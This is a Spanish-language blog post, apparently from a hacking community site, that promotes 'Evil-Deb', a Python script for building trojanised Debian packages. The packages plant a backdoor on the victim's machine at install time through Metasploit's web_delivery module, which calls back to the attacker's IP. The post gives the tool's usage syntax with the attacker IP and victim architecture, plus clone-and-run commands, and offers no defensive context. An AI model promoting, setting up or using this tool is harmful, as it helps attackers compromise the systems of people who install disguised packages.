Evil-Deb es un Script en python para generar paquetes debian (.deb) maliciosos desarrollado por Killerpop utilizando de manera remota un modulo de Metasploit, que consiste en un archivo bash. que se implementa en la siguiente ruta "/user/local/bin/". El Backdoor se ejecuta cuando la victima intenta instalar en su ordenador el archivo tipo .deb, en ese momento el archivo bash actúa como un comando en el sistema de la victima.
Es totalmente independiente, eso significa que el atacante no necesita instalar ningún creador de paquetes .deb para funcionar. Esta herramienta ademas se puede integrar con cualquier generador de carga útil(payload) de forma muy fácilmente.
Todo lo que el atacante necesita y depente es básicamente del modulo de Metasploit web_delivery de forma automatizada.
El comando a ser utilizado es:
python evil-deb.py -n lib (nombre del archivo .deb) -l 127.0.0.1(ip del atacante) -V 1.0(versión del archivo .deb) -a i386(arquitectura del sistema de la victima i386/amd64)
Versión actual: 1.0. y en proceso de desarrollo.
Comandos:
Comandos:
git clone https://github.com/Killerpop/evil-deb.git
cd evil-deb
chmod +x evil-deb.py
python evil-deb.py -h
cd evil-deb
chmod +x evil-deb.py
python evil-deb.py -h
Comentarios
Publicar un comentario
Todos sus comentarios seran bienvenidos, no se admiten insultos todo con el debido respeto que se merece cada persona, o de lo contrario seran eliminado cada comentario inrespetuoso hacia los demas. y autores del blog tambien puedes seguirnos en:
Facebook: https://www.facebook.com/groups/HackingTeamCyber/
Grupo de Telegram: https://t.me/TheHackForceOfficial
Canal de Youtube: https://www.youtube.com/channel/UCXy8Lg28OuGuI5Z-2EWJaNA?view_as=subscriber
Canal Vimeo: https://vimeo.com/403136547?activityReferer=1
Red Social Twitter: https://twitter.com/TheHackForce